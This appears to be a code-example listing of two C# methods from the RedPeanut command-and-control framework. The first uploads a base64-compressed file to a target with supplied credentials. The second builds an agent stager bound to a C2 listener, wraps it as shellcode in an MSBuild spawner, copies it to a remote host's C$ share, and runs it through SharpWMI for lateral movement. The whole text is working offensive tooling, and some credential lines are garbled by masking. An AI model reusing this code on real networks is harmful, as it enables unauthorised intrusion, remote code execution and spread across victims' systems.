Exemplo n.º 1
0
        private void Run()
        {
            if (string.IsNullOrEmpty(filepath) || !File.Exists(filepath))
            {
                return;
            }

            try
            {
                string filesrc = Convert.ToBase64String(CompressGZipAssembly(File.ReadAllBytes(filepath)));

                string destinationpath = ".";
                if (!string.IsNullOrEmpty(pathdest))
                {
                    destinationpath = pathdest.Replace("\\", "\\\\");
                }

                string destinationfilename = "";
                if (!string.IsNullOrEmpty(filename))
                {
                    destinationfilename = filename;
                }

                string domainname = ".";
                if (!string.IsNullOrEmpty(domain))
                {
                    domainname = domain;
                }

                // Parse .cs sorce and repalce variable
                string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);

                string source = File.ReadAllText(Path.Combine(folderrpath, FILEUPLOAD_TEMPLATE));
                source = Replacer.ReplaceFileUpLoad(source, filesrc, destinationpath, destinationfilename, username, password, domainname);

                string assembly = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, "FileUpLoader.dll", 40)));

                RunAssemblyBase64(assembly, "FileUpLoader", new string[] { "pippo" }, agent);
            }
            catch (Exception)
            {
                Console.WriteLine("[*] Error creating task");
            }
        }
Exemplo n.º 2
0
        private void Run()
        {
            try
            {
                if (string.IsNullOrEmpty(username) || string.IsNullOrEmpty(password) || string.IsNullOrEmpty(lhost) || (string.IsNullOrEmpty(lpipename) && lport < 1) || profile < 1)
                {
                    return;
                }
                else
                {
                    // Parse .cs sorce and repalce variable
                    string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
                    if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
                    {
                        string domainname = ".";
                        if (!string.IsNullOrEmpty(domain))
                        {
                            domainname = domain;
                        }

                        string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));

                        if (lpipename == null)
                        {
                            //Http no pivot stager
                            ListenerConfig conf = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
                            source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
                        }
                        else
                        {
                            //NamedPipe enable stager
                            ListenerPivotConfig conf = new ListenerPivotConfig("", lhost, lpipename, Program.GetC2Manager().GetC2Server().GetProfile(profile));
                            source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
                        }

                        string stagerstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", 40)));

                        //Create TaskMsg gzip
                        if (agent != null)
                        {
                            source = File.ReadAllText(Path.Combine(folderrpath, SPAWNER_TEMPLATE))
                                     .Replace("#NUTCLR#", Convert.ToBase64String(CompressGZipAssembly(Builder.GenerateShellcode(stagerstr, RandomString(10, new Random()) + ".exe", "RedPeanutRP", "Main", new string[] { "" }))))
                                     .Replace("#SPAWN#", Program.GetC2Manager().GetC2Server().GetProfile(profile).Spawn)
                                     .Replace("#USERNAME#", username)
                                     .Replace("#PASSWORD#", password)
                                     .Replace("#DOMAIN#", domain);

                            string spawner = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", 40)));

                            Dictionary <string, string> msbuildargs = new Dictionary <string, string>();
                            msbuildargs.Add("#{taskname}", taskname);

                            MSBuildGenerator gen = new MSBuildGenerator(spawner, msbuildargs);

                            string pathdest = string.Format(@"\\{0}\C$\Windows\temp", targethost);
                            string filename = RandomAString(10, new Random()).ToLower() + ".xml";
                            string filesrc  = Convert.ToBase64String(CompressGZipAssembly(Encoding.Default.GetBytes(gen.GetScriptText())));

                            string destinattionfull = pathdest.TrimEnd('\\') + @"\" + filename;

                            string destinationpath = ".";
                            if (!string.IsNullOrEmpty(pathdest))
                            {
                                destinationpath = pathdest.Replace("\\", "\\\\");
                            }

                            string destinationfilename = "";
                            if (!string.IsNullOrEmpty(filename))
                            {
                                destinationfilename = filename;
                            }

                            // Parse .cs sorce and repalce variable
                            source = File.ReadAllText(Path.Combine(folderrpath, FILEUPLOAD_TEMPLATE));
                            source = Replacer.ReplaceFileUpLoad(source, filesrc, destinationpath, destinationfilename, username, password, domainname);

                            string assembly = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, "FileUpLoader.dll", 40)));

                            //Task agent to copy file to target host
                            RunAssemblyBase64(assembly, "FileUpLoader", new string[] { "pippo" }, agent);

                            //Run msbuld via wmi
                            List <string> args = new List <string>();
                            args.Add("action=create");
                            args.Add("computername=" + targethost);
                            args.Add("username="******"\\" + username);
                            args.Add("password="******"command=C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\msbuild.exe C:\\Windows\\temp\\" + destinationfilename);

                            string s = "";
                            foreach (string ss in args.ToArray())
                            {
                                s += ss;
                            }
                            Console.WriteLine("String command: " + s);
                            RunAssembly(PL_MODULE_SHARPWMI, "SharpWMI.Program", args.ToArray(), agent);
                        }
                    }
                }
            } catch (Exception e)
            {
                Console.WriteLine("[*] Error running task build {0}", e.Message);
            }
        }